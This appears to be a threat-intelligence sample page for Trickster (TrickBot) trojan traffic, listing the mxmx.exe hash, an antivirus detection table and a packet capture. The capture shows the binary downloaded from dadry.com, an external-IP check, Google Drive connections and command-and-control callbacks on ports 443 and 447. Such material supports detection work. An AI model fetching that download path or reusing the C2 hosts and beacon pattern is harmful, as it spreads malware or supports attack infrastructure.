Trickster Google Drive Malware Trojan PCAP file download traffic sample mxmx.exe

Download Attachments

  • 1 pcap mxmx
    Date added: December 16, 2016 7:18 am
    File size: 42 KB
SHA256: 2b4d4eecea94a8d9020cdc1b739a4351ce80cc62a8d2ac2840917f6185c25bfc
File name: mxmx.exe
Detection ratio: 33 / 56
Analysis date: 2016-12-16 07:13:51 UTC
Antivirus                 Result                                        Update
AVG                       Generic_vb.NXE                                20161215
AVware                    Trojan.Win32.Generic.pak!cobra                20161216
Ad-Aware                  Trojan.GenericKD.3881958                      20161216
AegisLab                  Ransom.Hpcerber.Smj!c                         20161215
AhnLab-V3                 Trojan/Win32.Trickster.C1705114               20161215
Antiy-AVL                 Trojan/Win32.Trickster                        20161216
Arcabit                   Trojan.Generic.D3B3BE6                        20161216
Avast                     Win32:Malware-gen                             20161216
Baidu                     Win32.Trojan.WisdomEyes.16070401.9500.9927    20161207
BitDefender               Trojan.GenericKD.3881958                      20161216
Bkav                      HW32.Packed.1C08                              20161215
CrowdStrike Falcon (ML)   malicious_confidence_100% (W)                 20161024
ESET-NOD32                Win32/TrickBot.A                              20161216
Emsisoft                  Trojan.GenericKD.3881958 (B)                  20161216
F-Secure                  Trojan.GenericKD.3881958                      20161216
Fortinet                  W32/Trickster.BL!tr                           20161216
GData                     Trojan.GenericKD.3881958                      20161216
Invincea                  generic.a

2016-12-16 01:04:39.182180 IP 192.168.1.102.49978 > 31.24.30.241.80: Flags [P.], seq 0:287, ack 1, win 260, length 287: HTTP: GET /tester/mxmx.exe HTTP/1.1
GET /tester/mxmx.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dadry.com
Connection: Keep-Alive

2016-12-16 01:06:26.189922 IP 192.168.1.102.50599 > 75.75.75.75.53: 9753+ A? myexternalip.com. (34)
2016-12-16 01:06:26.302399 IP 192.168.1.102.49981 > 78.47.139.102.80: Flags [S], seq 3711211882, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 01:06:26.437003 IP 192.168.1.102.49981 > 78.47.139.102.80: Flags [.], ack 3657722638, win 256, length 0
2016-12-16 01:06:26.437482 IP 192.168.1.102.49981 > 78.47.139.102.80: Flags [P.], seq 0:89, ack 1, win 256, length 89: HTTP: GET /raw HTTP/1.1
GET /raw HTTP/1.1
User-Agent: Xmaker
Host: myexternalip.com
Connection: Keep-Alive

2016-12-16 01:06:31.770475 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [S], seq 2896142083, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 01:06:31.809601 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 2035296669, win 256, length 0
2016-12-16 01:06:31.809850 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 0:239, ack 1, win 256, length 239
[TLS ClientHello payload; server name: accounts.google.com]
2016-12-16 01:06:31.836205 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 2861, win 256, length 0
2016-12-16 01:06:31.842916 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 239:389, ack 3533, win 254, length 150
2016-12-16 01:06:31.872423 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 389:666, ack 3819, win 253, length 277
2016-12-16 01:06:31.926681 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 666:911, ack 3819, win 253, length 245
2016-12-16 01:06:31.983148 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 4853, win 256, length 0
2016-12-16 01:06:31.988107 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [F.], seq 911, ack 4853, win 256, length 0
2016-12-16 01:06:31.994276 IP 192.168.1.102.49166 > 75.75.75.75.53: 11282+ A? drive.google.com. (34)
2016-12-16 01:06:32.005816 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 4854, win 256, length 0
2016-12-16 01:06:32.014438 IP 192.168.1.102.49986 > 172.217.2.206.443: Flags [S], seq 1126792056, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 01:06:32.048427 IP 192.168.1.102.49986 > 172.217.2.206.443: Flags [.], ack 4136303932, win 256, length 0
2016-12-16 01:06:32.048560 IP 192.168.1.102.49986 > 172.217.2.206.443: Flags [P.], seq 0:236, ack 1, win 256, length 236
[TLS ClientHello payload; server name: drive.google.com]

2016-12-16 01:08:18.321929 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [S], seq 3971241777, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 01:08:18.535114 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [.], ack 3822376087, win 256, length 0
2016-12-16 01:08:18.535840 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 0:77, ack 1, win 256, length 77
2016-12-16 01:08:18.746672 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 77:267, ack 698, win 253, length 190
2016-12-16 01:08:18.943352 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 267:477, ack 749, win 253, length 210
2016-12-16 01:08:19.179437 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 477:815, ack 1146, win 252, length 338
2016-12-16 01:08:19.474028 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [S], seq 3636186194, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 01:08:19.490580 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [.], ack 1719, win 256, length 0
2016-12-16 01:08:19.776805 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 781100689, win 258, length 0
2016-12-16 01:08:19.777727 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [P.], seq 0:77, ack 1, win 258, length 77
2016-12-16 01:08:20.088105 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [P.], seq 77:391, ack 835, win 255, length 314
2016-12-16 01:08:20.407595 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [P.], seq 391:582, ack 882, win 255, length 191
2016-12-16 01:08:20.712334 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 3762, win 258, length 0
2016-12-16 01:08:20.713670 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 6642, win 258, length 0
2016-12-16 01:08:20.714528 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 9522, win 258, length 0
2016-12-16 01:08:20.715310 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 12402, win 258, length 0
2016-12-16 01:08:21.015415 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 22355, win 258, length 0
2016-12-16 01:08:27.125778 IP 192.168.1.102.49834 > 104.244.74.13.443: Flags [.], ack 2261342136, win 2658, length 0
2016-12-16 01:08:53.303862 IP 192.168.1.102.49833 > 91.121.230.214.443: Flags [.], ack 3390770720, win 952, length 0
2016-12-16 01:09:24.442620 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [.], ack 1749, win 256, length 0
2016-12-16 01:09:26.012623 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 22383, win 258, length 0
2016-12-16 01:09:26.632805 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [F.], seq 582, ack 22383, win 258, length 0
2016-12-16 01:09:26.633149 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [F.], seq 815, ack 1749, win 256, length 0
